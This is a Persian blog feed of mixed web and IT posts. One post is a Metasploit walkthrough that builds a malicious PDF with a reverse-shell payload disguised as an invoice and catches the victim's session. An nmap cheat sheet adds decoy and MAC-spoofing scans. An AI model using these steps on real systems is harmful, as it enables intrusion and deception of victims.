https://virgool.io/feed/@moeinomidii My way is the highway fa 2026-06-07 06:33:34 https://files.virgool.io/upload/users/238031/avatar/cyZVVF.jpeg?height=120&width=120 https://virgool.io/@moeinomidii https://virgool.io/notron/secutiry-zrz738vkbxsz چرا یک وب سایت باید ایمن باشد؟همه وب سایت ها در هر زمان مستعد حمله هستند. زیرا مجرمان سایبری هنگام برنامه ریزی برای اجرای یک حمله، وب سایت خاصی را در ذهن ندارند. آنها از برنامه هایی برای شناسایی خودکار وب سایت های حاوی آسیب پذیری استفاده می کنند. این آسیب‌پذیری‌ها به‌عنوان نقاط ورودی برای اجرای حمله به آن وب‌سایت خاص استفاده می‌شوند. آسیب‌پذیری‌های موجود در وب‌سایت شما می‌توانند خطرناک باشند،چون ممکن است حتی از آنها اطلاعی نداشته باشید. و این را بدانید که هیچ کس قرار نیست حفره های امنیتی را که دارید را به صورت رایگان به شما نشان دهد!با بیشتر شدن تهدیدات سایبری ، امنیت وب سایت اهمیت بیشتری پیدا می کند زیرا صاحبان وب سایت اکنون مشتاق محافظت از وب سایت ها و بازدیدکنندگان خود در برابر خطرات هستند. مجرمان سایبری همیشه به دنبال نقاط ضعف در وب سایت شما هستند. حملات سایبری بیشتر توسط بدافزارهایی ایجاد می شوند که می توانند: سرقت داده یا ترافیک کنندوب سایت خود را خراب یا کند کنیدوب سایت خود را از نتایج موتورهای جستجو حذف کنیدسرقت اطلاعات حساس مشتری، مانند شماره تلفن یا اطلاعات کارت اعتباری/دبیتچرا امنیت وب سایت امروزه مهم است؟بنابراین امنیت وب سایت برای محافظت از کسب و کار، نام تجاری و شهرت وب سایت شما و همچنین جلوگیری از ضرر مالی و بسته شدن وب سایت تجاری شما مهم است. شما می توانید از اعتبار وب سایت خود محافظت کنید و مشتریان و/یا بازدیدکنندگان را حفظ کنید. شناسایی بدافزارها و حملات سایبری برای شما دشوار خواهد بود. مجرمان سایبری در بدافزارهایی تخصص دارند که می توانند به طور نامحسوس وارد یک وب سایت شوند و پنهان بمانند تا وب سایت شما آلوده نشود و حتی ممکن است متوجه آن نباشید. دلیل چنین حملات بدافزاری بیشتر شامل cryptojacking می‌شود، که وب‌سایت‌ها را برای ارزهای رمزپایه استخراج می‌کند بدون اینکه هیچ علامتی نشان دهد، و درهای پشتی، یکی از انواع بدافزارها که به مجرمان سایبری اجازه دسترسی به یک وب‌سایت را بدون اطلاع مالک می‌دهد.برای محافظت از وب سایت خود به اقدامات امنیتی زیر نیاز دارید:گواهی SSLشما ابتدا به یک گواهی SSL نیاز دارید که از داده های جمع آوری شده توسط وب سایت شما هنگام انتقال از وب سایت شما به سرور محافظت می کند. این ممکن است یک معیار امنیتی بسیار اساسی وب سایت باشد، اما بسیار مهم است زیرا موتورهای جستجو و مرورگرهای محبوب در حال حاضر وب سایت های بدون SSL را به عنوان "ناامن" برچسب گذاری می کنند. این در واقع بازدیدکنندگان را به وب سایت شما مشکوک می کند.فایروال برنامه های وب (WAF) یکی دیگر از مؤلفه های کلیدی برای امنیت وب است زیرا می تواند حملات خودکاری را که معمولاً وب سایت های کمتر شناخته شده را هدف قرار می دهند متوقف کند. این حملات توسط ربات‌های بدی اجرا می‌شوند که می‌توانند به‌طور خودکار به دنبال آسیب‌پذیری‌هایی باشند که می‌توانند از آنها سوء استفاده کنند یا باعث حملات DDoS شوند که وب‌سایت شما را خراب یا کند می‌کند.بروز رسانی نرم افزارمسائل امنیتی و آسیب‌پذیری‌هایی که بیشتر در افزونه‌ها و برنامه‌های شخص ثالث شناسایی می‌شوند، وب‌سایت‌هایی را که بر روی یک سیستم مدیریت محتوا (CMS) میزبانی می‌شوند، در معرض خطر بیشتری قرار می‌دهند. با نصب به‌روزرسانی‌های افزونه‌ها و نرم‌افزارهای اصلی به‌موقع می‌توان از چنین سناریوهایی جلوگیری کرد، زیرا این به‌روزرسانی‌ها اغلب شامل وصله‌های امنیتی هستند.اسکنر وب سایتاگر در کشف یک حمله سایبری انجام شده در وب سایت خود بسیار دیر شده اید، هزینه بازیابی از این حمله فقط افزایش می یابد. برای جلوگیری از چنین وضعیتی، به یک اسکنر وب سایت خوب نیاز دارید که بتواند آسیب پذیری ها، بدافزارها و چندین مشکل امنیتی دیگر را شناسایی کند. یک اسکنر وب سایت نه تنها بدافزار شناخته شده را حذف می کند، بلکه به طور مرتب به دنبال تهدیدات می گردد و در صورت شناسایی هر چیزی فوراً به شما هشدار می دهد، بنابراین میزان آسیبی که می تواند به وب سایت شما وارد کند کاهش می یابد. معین امیدی معین امیدی Fri, 09 Dec 2022 18:42:27 +0330 https://virgool.io/notron/web-design-ohvcn2ou5isy با پیشرفت فناوری و وجود 4.66 میلیارد کاربر فعال اینترنت و در دسترس بودن بیش از 1.86 میلیارد وب سایت !نباید قدرت آن را در بیزینس نسل نو دست کم گرفت.تکنولوژی چگونه بر طراحی وب سایت تأثیر می گذارد؟تکنولوژی تأثیر زیادی بر نحوه دسترسی ما به اطلاعات در وب سایت ها دارد. با بکار گیری تکنولوژی های روز طراحی سایت در پلتفرم خود میتوانید سرعت لود ، امنیت و تجربه کاربری بهتری را در زمان کوتاهی توسعه دهید.پلتفرم های طراحی وبامروزه بیشتر وب سایت های تجاری با استفاده از پلتفرم های نوآورانه ساخته می شوند. طراحان وب در حال ارائه تم های واکنش گرا و PWA ها هستند که اکثر کسب و کار ها را از داشتن اپلیکیشن جدا برای موبایل ها بینیاز میکند.ری اکت چیست؟ری اکت یک کتابخانه مبتنی بر کامپوننت است که برای توسعه UI یا رابط کاربری وب Dynamic استفاده می شود. همه چیز در React یک جزء است. این مؤلفه‌ها با هم ادغام می‌شوند و یک برنامه بزرگ پویا را تشکیل می‌دهند.مزایای استفاده از ری اکت چیست؟بزرگترین مزیت React در سطح کنترل هنگام کار با کامپوننت ها است. در هر زمان، تغییر یک مؤلفه تأثیری بر بقیه برنامه‌ها نخواهد داشت. این در هنگام اجرای برنامه های کاربر محور که داده ها به طور مکرر تغییر می کنند بسیار سودمند خواهد بود. React در این زمان بسیار کارآمد است زیرا به‌جای لود مجدد غیرضروری کل برنامه، به‌طور خودکار فقط اجزای خاصی را که تغییر کرده‌اند به‌روزرسانی می‌کند. برخی دیگر از مزایای استفاده از React عبارتند از:ری اکت را می توان با هر چارچوبی (Backbone.js، Angular.js) استفاده کرد.با مشاهده تابع رندر، به راحتی می توان فهمید که چگونه یک جزء ارائه می شود.طرح، یا نحوه اتصال / ترکیب اجزا با یکدیگر به راحتی قابل مشاهده است.ری اکت خوانایی را تضمین می کند و قابلیت نگهداری را بسیار آسان تر می کند.دلایل استفاده از جنگوجنگو یک چارچوب وب است که توسعه سریع وب سایت های امن و scalable را امکان پذیر می کند. جنگو که توسط توسعه دهندگان باتجربه ساخته شده است، از بسیاری از مشکلات توسعه وب جلوگیری می کند، بنابراین می توانید بدون نیاز به اختراع مجدد چرخ، روی نوشتن برنامه خود تمرکز کنید.جنگو فوق سریع است ?هدف اولیه جنگو تبدیل سریع ایده های به پروژه واقعی بوده و از اصول توسعه سریع استفاده می کند که در آن یک توسعه دهنده می تواند بیش از یک تکرار را در یک زمان انجام دهد به جای اینکه کل برنامه را از ابتدا شروع کند.جنگو همچنین از اصل DRY (Don't Repeat Yourself) یا خودت تکرار نکن استفاده می کند. در نتیجه، توسعه دهندگان می توانند بدون اتلاف وقت برای نوشتن از ابتدا با کد های موجود کار های خود را پیش ببرند.برای شما به عنوان کارفرما چه معنایی دارد؟ زمان کمتری برای کد نویسی صرف میشودبه کیفیت کد اسیب نمیرسدامنیت در حد بالایی باقی میماندنتیجه نهایی منابع کمتری از سرور مصرف میکنداین فریم ورک دارای رابط مدیریت پویا نیز می باشد. هنگامی که مدل های خود را تعریف کردید، چارچوب یک رابط اداری حرفه ای و آماده برای تولید ایجاد می کند. به این معنا که کاربران احراز هویت شده می توانند اشیاء را اضافه، تغییر و حذف کنند.چه چیزی در آن برای شما وجود دارد؟ اگر کارمندان شما سایت یا یک مشتری یا شاید فقط شما را ویرایش می کنند، مجبور نخواهید بود فقط برای مدیریت محتوا با ایجاد رابط های پشتیبان سر و کار داشته باشید.یک گردش کار معمولی در ایجاد برنامه‌های جنگو، ایجاد مدل‌ها و راه‌اندازی سایت‌های مدیریت و راه‌اندازی سریع‌ترین زمان ممکن است، بنابراین کارکنان (یا مشتریان) شما می‌توانند شروع به جمع‌آوری داده‌ها کنند. سپس، روش ارائه داده ها به عموم را توسعه دهید.دراپ باکس از ابتدا از جنگو استفاده کرده است. توسعه دهندگان Dropbox از ویژگی های گسترده جنگو برای ذخیره و اشتراک گذاری فایل ها، همگام سازی حساب ها در چندین دستگاه و ارائه تاریخچه فایل به سرعت و بدون دردسر استفاده می کنند.جنگو مقیاس پذیر است (scalable)برخی از پرترافیک ترین سایت های روی کره زمین از توانایی جنگو برای مقیاس‌بندی سریع و انعطاف‌پذیر برای برآورده کردن نیازهای ترافیکی استفاده می‌کنند. در مقایسه با زمان توسعه، سخت افزار ارزان است، بنابراین جنگو به گونه ای طراحی شده است که تا جایی که می توانید از سخت افزار استفاده کنید.یکی از بزرگترین مزایای جنگو این است که این فریم ورک از معماری "هیچ چیز مشترک" استفاده می کند، به این معنی که می توانید سخت افزار را در هر سطحی اضافه کنید - سرورهای پایگاه داده، سرورهای کش یا سرورهای وب / برنامهفریم ورک به طور تمیز اجزایی مانند لایه پایگاه داده و لایه برنامه را جدا می کند. و با یک چارچوب کش ساده و در عین حال قدرتمند عرضه می شود.با جنگو چه کاری می توانید انجام دهید؟شرکت‌ها، سازمان‌ها و دولت‌ها از این چارچوب برای ساخت انواع چیزها استفاده کرده‌اند - از سیستم‌های مدیریت محتوا گرفته تا شبکه‌های اجتماعی و پلت‌فرم‌های محاسباتی علمی.بعلاوه، جنگو در صنایع پر تقاضا، مانند فین تک، که محصولات باید 100% ایمن، قابل اعتماد و مطابق با مقررات دولتی و بین المللی باشند، معجزه می کند.اما پس از آن مشتری تصمیم گرفت آن را مجدداً به SaaS تغییر کاربری دهد و آن را به سایر آژانس‌های همتا بفروشد. و فقط چند ماه دیگر طول کشید تا باطن جنگو را برای تطبیق با معماری چند مستاجر بازسازی کنیم.جنگو امن استچارچوب جنگو شامل یک ویژگی امنیتی داخلی است که از برنامه شما در برابر تهدیدات امنیتی مختلف محافظت می کند.این فریم ورک به توسعه دهندگان کمک می کند تا از بسیاری از اشتباهات امنیتی رایج مانند تزریق SQL، اسکریپت بین سایتی، جعل درخواست بین سایتی و کلیک جک جلوگیری کنند. علاوه بر این، سیستم احراز هویت کاربر آن راهی امن برای مدیریت حساب‌های کاربری و رمز عبور فراهم می‌کند.زمانی که ما در حال توسعه یک وب‌سایت برای تجارت الکترونیک بودیم، امنیت یک موضوع حیاتی بود زیرا ما نیاز به اطمینان از حفاظت از تراکنش و داده‌های شخصی خریداران داشتیمبا Django، به دلیل ویژگی های امنیتی داخلی جنگو، مشکلی وجود نداشت. در نتیجه، نیازی به صرف زمان اضافی برای ایجاد لایه‌های امنیتی اضافی نداشتیم و پروژه را در چند هفته تکمیل کردیم. معین امیدی معین امیدی Tue, 20 Sep 2022 18:28:12 +0430 https://virgool.io/notron/pwa-k2zxgs1hpnda برنامه‌های PWA ، برنامه‌های تحت وب هستند که با API های مدرن و تقویت ساخته شده‌اند تا قابلیت‌ نصب پیشرفته‌تری را ارائه دهند و در عین حال به هر کسی در هر کجا روی هر دستگاهی دسترسی داشته باشند، همه با یک سورس کد مشترک!سایت های PWA برای ارائه تجربه مطمئن‌تر به کاربر از قابلیت‌های جدید برای ارائه تجربه یکپارچه‌تر استفاده می‌کنند و قابل نصب هستند.و پس از نصب، PWA ها مانند برنامه های دیگر به نظر می رسند:این یک icon در صفحه اصلی.هنگامی که برنامه های موجود در دستگاه را جستجو می کنید ظاهر می شود.در یک پنجره مستقل باز می شود که کاملاً از رابط کاربری مرورگر جدا شده است.به سطوح بالاتری از یکپارچگی با سیستم عامل دسترسی دارد، به عنوان مثال، مدیریت URL یا سفارشی سازی نوار عنوان.می تواند به صورت آفلاین کار کند.پلت فرم وب ترکیبی از cross platform بودن در بین دستگاه ها و سیستم عامل ها، مدل امنیتی کاربر محور آن، و این واقعیت که هیچ شرکتی مشخصات یا پیاده سازی آن را کنترل نمی کند، آن را به یک پلت فرم قدرتمند برای ارائه مدرن اپلیکیشن تبدیل کرده است.برنامه های کاربردی وب می توانند به هر کسی، در هر مکان و در هر دستگاهی با یک پایگاه کد واحد دسترسی پیدا کنند. که برای توسعه دهندگان وب مکانیسم deploy شفاف و ساده ارائه می دهد. نیازی به بسته بندی، بررسی محتوای اضافی، یا تاخیر در به روز رسانی وجود ندارد. کاربران همیشه هنگام بازدید از برنامه شما آخرین نسخه را دریافت می کنند. با قابلیت‌ها و تکنیک‌های جدید، یک برنامه وب اکنون می‌تواند به شما امکان تعامل یا دیدن محتوا را حتی در حالت آفلاین بدهد، مانعی که چند سال پیش غلبه بر آن غیرممکن بود.برنامه های پلتفرم خاصبرنامه های مخصوص پلتفرم، هم در موبایل و هم در دسکتاپ، به دلیل غنی بودن و قابل اعتماد بودن شهرت دارند. آنها همیشه در صفحه‌های اصلی هستند.و بدون توجه به اتصال اینترنت کار می کنند و در تجربه مستقل خود راه اندازی می شوند. آنها می‌توانند فایل‌ها را از فایل سیستم گوشی شما بخوانند و بنویسند، به سخت‌افزار متصل شده از طریق USB، سریال یا بلوتوث دسترسی هایی داشته باشند.با داده‌های ذخیره‌شده در دستگاه‌های شما، مانند مخاطبین و رویدادهای تقویم، تعامل داشته باشند. همچنین می‌توانید در برنامه دیگری عکس بگیرید.در سیستم‌عامل‌های مدرن موبایل، برنامه‌های مخصوص پلتفرم عمدتاً از store ها نصب می‌شوند، با قوانین و محدودیت‌هایی که چه کسی چه چیزی را می‌تواند برای کاربرانش منتشر کند. این برنامه‌ها معمولاً به‌عنوان یک بسته بزرگ APK هستند و هر به‌روزرسانی نیاز به بسته‌بندی مجدد، امضای مجدد، تأیید مجدد و نصب مجدد روی دستگاه دارد! معین امیدی معین امیدی Tue, 20 Sep 2022 18:25:15 +0430 https://virgool.io/@moeinomidii/cloudflare-fixed-ir-issue-btbbzoszvukn یکی از دلایل اصلی مهاجرت از کلادفلر به سرویس های ابری ایرانی مشکل استفاده از Cloudflare روی دامنه های IR است.در مقاله "چرا استفاده کردن از ابرآروان خطرناک است" توضیح دادم که چرا نباید از سرویس های ابری ایرانی استفاده کنید.در برخی از اکانت های قدیمی Cloudflare همچنان این مشکل وجود دارد و دلیل به وجود امدن آن تحریم SSL Comodo میباشد ، که برای دامنه های IR گواهینامه امنیتی صادر نمیکند. اگر این مشکل برای شما هنوز برطرف نشده است بهتر است یک اکانت جدید بسازید و از DNS های جدید استفاده کنید.اما دقت داشته کنید خرید Cloudflare PRO برای دامنه های IR و حتی سایت هایی که به IP ایران پوینت میشوند نیز وجود ندارد! فقط سرویس Optimization Wordpress روی دامنه های ملی قابل استفاده میباشد.برای دریافت اطلاعات درباره خرید پلن های Cloudflare با تیم فروش کرالاهاست تماس بگیرید.نمونه DNS که با دامنه IR مشکل دارند فراموش نکنید تنظیمات SSL به این صورت باشدیک نمونه دامنه IR که از Cloudflare استفاده میکند هم مورد بررسی قرار میدهیم.اطلاعات WHOIS برای نمایش DNSدر عکس بعدی گواهینامه که توسط کلادفلر ساخته شده را مشاهده میکنید. (Let's Encrypt)https://www.sslshopper.com/برای اطمینان استفاده از Cloudflare به عنوان CDN ای پی که در بالا میبینید را Resolve میکنم .https://ipinfo.io/نمونه GTMetrix گرفته شدهالبته توجه داشته باشید که سایت شما ممکن است بعد از استفاده از CDN تغییر زیادی نکند برای این کار باید از Cloudflare خرید ارزی انجام بدید . در بالا هم کرالاهاست معرفی کردیم که نماینده فروش محصولات Cloudflare در ایران هستند.اگر این مقاله برای شما مفید بوده حتما لایک کنید و نظرتون رو بنویسید . برای دیدن مقاله های بیشتر هم من در ویرگول دنبال کنید. معین امیدی معین امیدی Sat, 02 Oct 2021 15:31:51 +0330 https://virgool.io/fboard/pdf-exploit-b5tpewfgdm9k هک شدن ویندوز تنها با یک فایل PDF!!راه های مختلفی برای Exploit کردن ویندوز و دسترسی کامل به آن وجود دارد. امروز با استفاده از یه فایل pdf که شامل یک ویروس است این کار را انجام میدهیم.برای انجام این کار شما میتونید از کالی لینوکس استفاده کنید یا روی یک ماشین مجازی لینوکس (ترجیحا ابونتو) آن را نصب کنید.بعد از ورود به کالی دستور زیر اجرا کنیدsudo msfconsoleسپس به دنبال exploit های pdf میگردیم .این دستور تمام exploit های موجود با استفاده از ضعف های امنیتی Adobe را نمایش میدهد.search type:exploit platform:windows adobe pdfدر اینجا exploit های زیادی مربوط به ویندوز را میبینیم ما دنبال مناسب ترین برای این مقاله هستیم. که از adobe_pdf_embedded_exe استفاده میکنیم و به شکل زیر آن را فراخوانی میکنیم.use exploit/windows/fileformat/adobe_pdf_embedded_exeبعد از انجام تنظیمات باید payload به صورت embed شده توی فایل pdf قرار بدیم .set payload windows/meterpreter/reverse_tcpهمان گونه که در اسکرین شات بالا میبینید فقط نیاز داریم آدرس LHOST اضافه کنیم که در اصطلاح attacking machine ما هست ، معمولا از سرور مجازی برای target واقعی استفاده میکنند. حال باید فایل embed در pdf بسازیم.set LHOST 192.168.1.90خب ، برای انتخاب نام فایل هم باید نامی انتخاب کنید که برای کاربر شک برانگیز نباشد.set FILENAME invoice.pdfدر مرحله بعدی دستور exploit تایپ میکنیم و فایل pdf ما ساخته میشه.exploitهمان طور که میبینید فایل ساخته شد و در مسیر مشخص شده در تصور میبینید ذخیره شده است .در مرحله بعد باید فایل pdf به آدرس وب سرور منتقل کنیم. با دستور زیر وب سرور روی ماشین کالی خود اجرا کنیدsudo service apache2 startسپس فایل را به root document وب سرور جابجا میکنیم. mv /root/.msf4/local/payroll.pdf /var/www/htmlحال ما نیاز داریم ماشین مجازی روی یک پورت خاص تنظیم کنیم .use exploit/multi/handlerو سپس همان payload که برای فایل pdf انتخاب کردیم.set payload windows/meterpreter/reverse_tcpدوباره Ip ماشین مجازی که بالا وارد کردید را تعریف کنید.set LHOST 192.168.1.90همون طوری که در تصویر مشاهده میکنید پورت 4444 است . فقط کافی است آن را اجرا کنیم.runدقت کنید برای درک بهتر این سناریو بسیار ساده سازی شده است . هکر ها معمولا این فایل ها را به صورت ایمیل ، پیشنهاد های جذاب یا در قالب نام یک کتاب مشهور برای قربانیان ارسال میکنند.وارد ماشین ویندوز خود شوید ادرس زیر تایپ کنید.http://192.168.1.90/invoice.pdfبعد از دانلود و باز کردن فایل روی ویندوز به metasploit بر میگردیم و میبینیم که یک session باز داریم.تمام! حالا یک دسترسی کامل از ماشین ویندوز داریم فقط کافیست دستور shell بنویسید تا به فایل سیستم دسترسی پیدا کنید .از اینجا هم میتونید backdoor های مختلفی به وجود بیارید .چگونه از خود محافظت کنیم؟با استفاده از آنتی ویرویس های معتبر میتوانید به راحتی فایل های آلوده را تشخیص دهید . نمونه مشابه تشخیص داده شده در آنتی ویروس Kaspersky.اگر این مقاله برای شما مفید بوده حتما لایک کنید و نظرتون رو بنویسید . برای دیدن مقاله های بیشتر هم من در ویرگول دنبال کنید. معین امیدی معین امیدی Fri, 20 Aug 2021 07:43:50 +0430 https://virgool.io/@moeinomidii/top30-nmap-cmd-examples-i0omqtwtsnik کلمه nmap سرواژه سازی شده از Network Mapper است.یک ابزار Open source برای بررسی شبکه ، اسکن های امنیتی و بازرسی وضعیت شبکه است. این در حالی است که Option های در nmap هستند که ممکن است برای کاربران تازه وارد گیج کننده یا پیچیده باشد. هدف از نوشتن این مقاله آشنا کردن کاربران جدید با command line این برنامه است ، تا بتوانید شبکه را اسکن و vulnerability ها را شناسایی کنید.چطور باید nmap رو لینوکس نصب کنم؟برای نصب روی ابونتو ترمینال را باز کنید سپس دستور زیر را تایپ کنید.sudo apt install nmap -yو برای centos دستور زیر :sudo yum install nmap -yبعد از اتمام نصب جهت اطمینان و بررسی ورژن نصب شده دستور زیر را وارد میکنیم.nmap --versionNmap version 5.51 ( http://nmap.org )1.اسکن یک IP با استفاده از nmap اسکن یک ip در لحظهnmap 192.168.1.1 اسکن با استفاده از hostnamenmap server1.example.xyz اسکن هاست و پرینت مراحل در لحظه nmap -v server1.example.xyz2. اسکن چند IP و افزودن Subnet های شبکهاسکن چند ای پی هم زمان در nmap ، فقط کافی بینشون space بزنید.nmap 192.168.1.1 192.168.1.2 192.168.1.3استفاده از subnet کار خیلی راحت میکنه.nmap 192.168.1.0/243.خوندن لیست ip و hostname ها از فایل textبرای استفاده از این قابلیت باید از گزینه -iL در زمان فراخوانی استفاده کنید. این ویژگی زمانی به کار میاد که میخواید شبکه های بزرگ اسکن کنید.ابتدا فایلتون با استفاده از vi ، nano یا هرچیز دیگه ای که بهش عادت دارید ایجاد کنید ? بعد توی هر خط یک hostname یا ip وارد کنید. دستور هم به صورت زیر اجرا کنید.nmap -iL /tmp/test.txtنمونه فایل شما باید به صورت زیر باشد.server1.cyberciti.biz 192.168.1.0/24 192.168.1.1/24 10.1.2.3 localhost4.اسکن ip با excluding زمانی که دارید یه شبکه بزرگ اسکن میکنید ممکن از نیازی به بررسی و برخی از ip ها نداشته باشید .دقت کنید که باید با , از هم جدا بشن!nmap 192.168.1.0/24 --exclude 192.168.1.5,192.168.1.2545.تشخیص سیستم عامل و نسخه استفاده شدهnmap -A 192.168.1.2546. تشخیص استفاده شبکه مورد نظر از Firewallnmap -sA 192.168.1.254nmap -sA example.xyz7.اسکن شبکه هایی که Firewall دارندبعد از اجرا کامند شماره 6 در صورتی که متوجه شداید شبکه مورد نظر از Firewall استفاده میکند حتما از فلگ -PN استفاده کنید.nmap -PN 192.168.1.1nmap -PN example.xyz8. اسکن IPv6 ها در nmapهمانطور که در پایین میبینید فقط کافیه از فلگ -6 استفاده کنید.nmap -6 IPv6-Address-Herenmap -6 server1.example.xyznmap -6 2607:f0d0:1002:51::4nmap -v A -6 2607:f0d0:1002:51::49.لیست ip های فعال در subnet nmap -sP 192.168.1.0/24نتیجه هم به صورت زیر نمایش داده میشوند.Host 192.168.1.1 is up (0.00035s latency).MAC Address: BC:AE:C5:C3:16:93 (Unknown)Host 192.168.1.2 is up (0.0038s latency).MAC Address: 74:44:01:40:57:FB (Unknown)Host 192.168.1.5 is up.Host nas03 (192.168.1.12) is up (0.0091s latency).MAC Address: 00:11:32:11:15:FC (Synology Incorporated)Nmap done: 256 IP addresses (4 hosts up) scanned in 2.80 second10. اسکن سریع یک شبکهمحبوب ترین فلگ که من ازش استفاده میکنم -F که از fast میاد. خوبیش هم اینه که خیلی سریع پورت های مهم براتون اسکن میکنه و نتایج رو نشون میده.nmap -F 192.168.1.111. بررسی دقیق وضعیت پورت و روش تخصیص nmapدر زمان اسکن اگر به شما نمایش داده شود که پورت 22 است و شما میخواهید روش تخصیص nmap را بدانید خوب است که از دستور زیر استفاده کنید.nmap --reason 192.168.1.1 nmap --reason server1.example.xyzخروجی به صورت زیر است:Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-07 21:16 IST Nmap scan report for router (192.168.2.254) Host is up, received arp-response (0.00026s latency). Not shown: 995 filtered ports Reason: 995 no-responses PORT STATE SERVICE REASON 22/tcp open ssh syn-ack ttl 64 53/tcp open domain syn-ack ttl 64 80/tcp open http syn-ack ttl 64 443/tcp open https syn-ack ttl 64 666/tcp open doom syn-ack ttl 64 MAC Address: 00:08:A2:0D:05:41 (ADI Engineering)   Nmap done: 1 IP address (1 host up) scanned in 4.85 seconds12.فقط پورت های باز را نمایش بدهnmap --open 192.168.1.113.نمایش تمام پکت های ارسال و دریافت شدهnmap --packet-trace 192.168.1.1nmap --packet-trace server1.example.xyz14.نشان دادن interface host و routernmap --iflistنتیجه هم به صورت زیر خواهد بود:Starting Nmap 5.00 ( http://nmap.org ) at 2012-11-27 02:01 IST ************************INTERFACES************************ DEV (SHORT) IP/MASK TYPE UP MAC lo (lo) 127.0.0.1/8 loopback up eth0 (eth0) 192.168.1.5/24 ethernet up B8:AC:6F:65:31:E5 vmnet1 (vmnet1) 192.168.121.1/24 ethernet up 00:50:56:C0:00:01 vmnet8 (vmnet8) 192.168.179.1/24 ethernet up 00:50:56:C0:00:08 ppp0 (ppp0) 10.1.19.69/32 point2point up   **************************ROUTES************************** DST/MASK DEV GATEWAY 10.0.31.178/32 ppp0 209.133.67.35/32 eth0 192.168.1.2 192.168.1.0/0 eth0 192.168.121.0/0 vmnet1 192.168.179.0/0 vmnet8 169.254.0.0/0 eth0 10.0.0.0/0 ppp0 0.0.0.0/0 eth0 192.168.1.215.اسکن و بررسی یک پورت ## Scan port 80 nmap -p 80 192.168.1.1   ## Scan TCP port 80 nmap -p T:80 192.168.1.1   ## Scan UDP port 53 nmap -p U:53 192.168.1.1   ## Scan two ports ## nmap -p 80,443 192.168.1.116.سریع ترین راه برای اسکن پورت های یک subnetnmap -T5 192.168.1.0/24 nmap -T5 {sub/net}17.حدس سیستم عامل با کمک nmapnmap -O 192.168.1.1 nmap -O --osscan-guess 192.168.1.1 nmap -v -O --osscan-guess 192.168.1.118.حدس ورژن سرویس های درحال اجرا روی پورت هاnmap -sV 192.168.1.119. اسکن هاست به استفاده از TCP ACK(PA) و TCP SYN(PS)nmap -PS 192.168.1.1 nmap -PS 80,21,443 192.168.1.1 nmap -PA 192.168.1.1 nmap -PA 80,21,200-512 192.168.1.120.اسکن با استفاده از پورت pingnmap -PO 192.168.1.121. اسکن با استفاده از UDP pingnmap -PU 192.168.1.1 nmap -PU 2000.2001 192.168.1.122.پیدا کردن بیشترین پورت های TCP با استفاده از متد TCP SYN nmap -sS 192.168.1.1nmap -sT 192.168.1.1nmap -sA 192.168.1.1nmap -sW 192.168.1.1nmap -sM 192.168.1.123.اسکن هاست برای سرویس های UDPnmap -sU nas03 nmap -sU 192.168.1.124. اسکن روی پورت های IPnmap -sO 192.168.1.125.بررسی فایروال برای ضعف های امنیتیnmap -sN 192.168.1.254 nmap -sX 192.168.1.25426.بررسی فایروال برای Packet fragmentnmap -f 192.168.1.127.مخفی کردن اسکن شبکه با decoysnmap -n -D192.168.1.5,10.5.1.2,172.1.2.4,3.4.2.1 192.168.1.528.اسکن فایروال برای mac address spoofingnmap --spoof-mac MAC-ADDRESS-HERE 192.168.1.129.چگونه خروجی یک اسکن را ذخیره کنم؟nmap 192.168.1.1 > output.txt nmap -oN output.txt 192.168.1.130.بررسی وب سرور و پایپ کردن آن به Niktonmap -p80,443 192.168.1.2/24 -oG - | /path/to/nikto.pl -h -جمع بندی در این مقاله روش استفاده از command line در nmap را با کلی مثال مختلف یادگرفتید. به شما پیشنهاد میکنم documentation رسمی nmap از طریق لینک زیر مطالعه نمایید. https://nmap.org/book/man.html اگر این مقاله برای شما مفید بوده حتما لایک کنید و نظرتون رو بنویسید . برای دیدن مقاله های بیشتر هم من در ویرگول دنبال کنید. معین امیدی معین امیدی Sun, 18 Jul 2021 18:05:52 +0430 https://virgool.io/@moeinomidii/%D9%87%D8%B1-%DA%86%DB%8C%D8%B2-%DA%A9%D9%87-%D8%A8%D8%A7%DB%8C%D8%AF-%D8%AF%D8%B1%D8%A8%D8%A7%D8%B1%D9%87-centos-stream-%D8%A8%D8%AF%D8%A7%D9%86%DB%8C%D8%AF-lzhjadspgsc6 اخیرا شرکت Redhat که از زیر مجموعه های IBM است سیستم عامل Centos را کشت! الان میتونید ازش استفاده کنید نسخه 7 تا پایان سال 2024 و نسخه 8 تا پایان سال 2021.در این مقاله هر چیزی که باید درباره centos stream بدونید بهتون توضیح میدم. برخلاف نسخه های قبلی centos در نسخه Centos Stream اپدیت ها به صورت Upstream هستن و مثل قبلا rolling-release نیستن . خب معنیش چیه؟ یعنی اپدیت های که ارائه میشن ،دیگه سیستم عامل مثل نسخه های قبلی stable نیست!سنت او اس استریم یک نسخه درحال توسعه از RHEL خواهد بودبرای این که این قضیه بیشتر درک کنید و در جریان توسعه سنت او اس استریم باشید پیشنهاد میکنم صفحه رسمی وبلاگ شون مطالعه کنید.اگر بخوام به زبون ساده بگم سنت او اس از این به بعد از Redhat OS جلوتره شما هایی که دارید ازش استفاده میکنید موش آزمایشگاهی محصوب میشید. ایراداتش در میاد بعد که stable شد همه چی، روی redhat اپدیت ها میاد.خب حالا سنت او اس استریم چه مشکلی حل میکنه؟احتمالا بدونید توسعه RHEL در کمپانی رد هت متوقف شده . با سنت او اس استریم اپدیت های جدید را کاربران community میدن برای همین اومدن centos stream معرفی کردن و اسمش گذاشتن development build of RHEL این کارو کردن که پول کمتری خرج کرده باشن!از اون طرف اگر میخواهید از یه نسخه درست حسابی استفاده کنید که stable باشه مثل centos های قبلی باید برید subscription از RedHat بخرید . قیمت ها هم برای RedHat Enterprise Linux Server از سالیانه 350 دلار شروع میشه پشتیبانی هم نداره فقط لایسنس برای پشتیبانی باید 300 تا دیگه بدید ?.RedHat Enterprise Linux Server مت لایسنس های در کل بخوام بگم واسه افراد عادی به هیچ دردی نمیخوره فقط واسه نرد هایی که میخوان ابزارها و function های جدید RHEL تست کنن خوبه.آیا CentOS Stream قراره جایگزین CentOS Linux بشه ؟خیر . Centos Linux یه Rebuild از RHEL بوده . اما Centos Stream یک نسخه برای development rhel که همه ویژگی های رد هت داره با این تفاوت که stable نیست!پس centos stream بیشتر برای کسانی است که دوست دارن ویژگی های جدید centos قبل از stable شدن ببینند یا میخوان سرور های یا نرم افزار هایی که دارن برای آینده اماده کنند یا قصد توسعه و برطرف کردن باگ های استریم را دارند.مهاجرت از centos به Redhat Enterprise Linux چند ماه پیش همه از شنیدن خبر Discontinue شدن centos 8 شک شدیم . و برامون سوال شد که اگر بخوایم لایسنس بگیریم چطوری باید از centos به redhat بریم جواب این سوال یکم پیچیدست لینک زیر 